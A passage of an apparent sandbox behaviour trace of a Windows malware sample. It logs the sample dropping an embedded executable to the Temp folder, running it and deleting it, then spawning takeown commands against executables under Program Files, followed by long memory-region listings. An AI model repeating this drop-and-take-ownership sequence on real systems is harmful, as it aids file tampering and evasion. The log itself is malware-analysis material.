xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xd9\x80\xe1\x9f\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0286.414] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0286.414] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0286.414] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0286.414] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0286.414] GetCurrentProcess () returned 0xffffffff [0286.414] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0286.414] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0286.415] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0286.415] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0286.415] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0286.415] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0286.415] LockResource (hResData=0x43c648) returned 0x43c648 [0286.415] GetCurrentPackageId () returned 0x3d54 [0286.415] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0286.501] GetFileType (hFile=0x174) returned 0x1 [0286.501] WriteFile (in: hFile=0x174, lpBuffer=0x43c648*, nNumberOfBytesToWrite=0x37000, lpNumberOfBytesWritten=0x19defc, lpOverlapped=0x0 | out: lpBuffer=0x43c648*, lpNumberOfBytesWritten=0x19defc*=0x37000, lpOverlapped=0x0) returned 1 [0286.504] WriteFile (in: hFile=0x174, lpBuffer=0x232cf0*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x19def8, lpOverlapped=0x0 | out: lpBuffer=0x232cf0*, lpNumberOfBytesWritten=0x19def8*=0x490, lpOverlapped=0x0) returned 1 [0286.504] CloseHandle (hObject=0x174) returned 1 [0286.504] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner" [0286.504] CreateProcessW (in: lpApplicationName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe", lpCommandLine="vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fac4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fb08 | out: lpCommandLine="vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner", lpProcessInformation=0x19fb08*(hProcess=0x178, hThread=0x174, dwProcessId=0x834, dwThreadId=0x268)) returned 1 [0286.795] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0xffffffff) returned 0x0 [0292.891] DeleteFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe")) returned 1 [0292.892] CloseHandle (hObject=0x178) returned 1 [0292.892] CloseHandle (hObject=0x174) returned 1 [0292.893] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0292.893] ExitProcess (uExitCode=0x0) Thread: id = 943 os_tid = 0xb48 Process: id = "121" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x1acdd000" os_pid = "0x930" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "95" os_parent_pid = "0x974" cmd_line = "takeown /F \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8609 start_va = 0x100000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 8610 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 8611 start_va = 0x130000 end_va = 0x143fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 8612 start_va = 0x150000 end_va = 0x153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 8613 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 8614 start_va = 0x180000 end_va = 0x417ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 8615 start_va = 0x4180000 end_va = 0x41bffff entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 8616 start_va = 0x41c0000 end_va = 0x41fffff entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 8617 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8618 start_va = 0x7ed60000 end_va = 0x7ed82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed60000" filename = "" Region: id = 8619 start_va = 0x7ed88000 end_va = 0x7ed88fff entry_point = 0x0 region_type = private name = "private_0x000000007ed88000" filename = "" Region: id = 8620 start_va = 0x7ed8c000 end_va = 0x7ed8cfff entry_point = 0x0 region_type = private name = "private_0x000000007ed8c000" filename = "" Region: id = 8621 start_va = 0x7ed8d000 end_va = 0x7ed8ffff entry_point = 0x0 region_type = private name = "private_0x000000007ed8d000" filename = "" Region: id = 8622 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8623 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8624 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 8625 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8626 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8627 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 8628 start_va = 0x4200000 end_va = 0x4201fff entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 8651 start_va = 0x42f0000 end_va = 0x42fffff entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 8652 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8653 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8654 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8655 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8656 start_va = 0x4300000 end_va = 0x450ffff entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 8657 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8658 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8659 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 8660 start_va = 0x7ec60000 end_va = 0x7ed5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec60000" filename = "" Region: id = 8758 start_va = 0x4210000 end_va = 0x42cdfff entry_point = 0x4210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8759 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8760 start_va = 0x4300000 end_va = 0x433ffff entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 8761 start_va = 0x4340000 end_va = 0x437ffff entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 8762 start_va = 0x4410000 end_va = 0x450ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 8763 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 8764 start_va = 0x7ed89000 end_va = 0x7ed8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ed89000" filename = "" Region: id = 8765 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 8766 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8767 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8768 start_va = 0x110000 end_va = 0x113fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 8769 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8770 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8771 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8772 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 8773 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 8774 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 8775 start_va = 0x4510000 end_va = 0x467ffff entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 8776 start_va = 0x4380000 end_va = 0x43a9fff entry_point = 0x4380000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8777 start_va = 0x4680000 end_va = 0x4807fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004680000" filename = "" Region: id = 8778 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8779 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 8780 start_va = 0x120000 end_va = 0x124fff entry_point = 0x120000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\takeown.exe.mui") Region: id = 8781 start_va = 0x4810000 end_va = 0x4990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004810000" filename = "" Region: id = 8782 start_va = 0x49a0000 end_va = 0x5d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049a0000" filename = "" Region: id = 8783 start_va = 0x42d0000 end_va = 0x42d0fff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 8784 start_va = 0x42e0000 end_va = 0x42e0fff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 8836 start_va = 0x5da0000 end_va = 0x60d6fff entry_point = 0x5da0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8837 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8838 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Thread: id = 940 os_tid = 0xee8 Thread: id = 945 os_tid = 0x4b0 Process: id = "122" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x7a9ce000" os_pid = "0x5b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "105" os_parent_pid = "0xf4c" cmd_line = "takeown /F \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8631 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 8632 start_va = 0x5a0000 end_va = 0x459ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 8633 start_va = 0x45a0000 end_va = 0x45bffff entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 8634 start_va = 0x45c0000 end_va = 0x45c1fff entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 8635 start_va = 0x45d0000 end_va = 0x45e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045d0000" filename = "" Region: id = 8636 start_va = 0x45f0000 end_va = 0x462ffff entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 8637 start_va = 0x4630000 end_va = 0x466ffff entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 8638 start_va = 0x4670000 end_va = 0x4673fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004670000" filename = "" Region: id = 8639 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8640 start_va = 0x7f800000 end_va = 0x7f822fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f800000" filename = "" Region: id = 8641 start_va = 0x7f823000 end_va = 0x7f823fff entry_point = 0x0 region_type = private name = "private_0x000000007f823000" filename = "" Region: id = 8642 start_va = 0x7f82c000 end_va = 0x7f82efff entry_point = 0x0 region_type = private name = "private_0x000000007f82c000" filename = "" Region: id = 8643 start_va = 0x7f82f000 end_va = 0x7f82ffff entry_point = 0x0 region_type = private name = "private_0x000000007f82f000" filename = "" Region: id = 8644 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8645 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8646 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 8647 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8648 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8649 start_va = 0x4680000 end_va = 0x4680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004680000" filename = "" Region: id = 8650 start_va = 0x4690000 end_va = 0x4691fff entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 8682 start_va = 0x4710000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 8683 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8684 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8685 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8686 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8687 start_va = 0x4720000 end_va = 0x498ffff entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 8688 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8689 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8690 start_va = 0x45a0000 end_va = 0x45affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 8691 start_va = 0x7f700000 end_va = 0x7f7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f700000" filename = "" Region: id = 8809 start_va = 0x4720000 end_va = 0x47ddfff entry_point = 0x4720000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8810 start_va = 0x4890000 end_va = 0x498ffff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 8811 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8812 start_va = 0x46a0000 end_va = 0x46dffff entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 8813 start_va = 0x47e0000 end_va = 0x481ffff entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 8814 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 8815 start_va = 0x7f829000 end_va = 0x7f82bfff entry_point = 0x0 region_type = private name = "private_0x000000007f829000" filename = "" Region: id = 8816 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 8817 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8818 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8819 start_va = 0x45b0000 end_va = 0x45b3fff entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 8820 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8821 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8822 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" 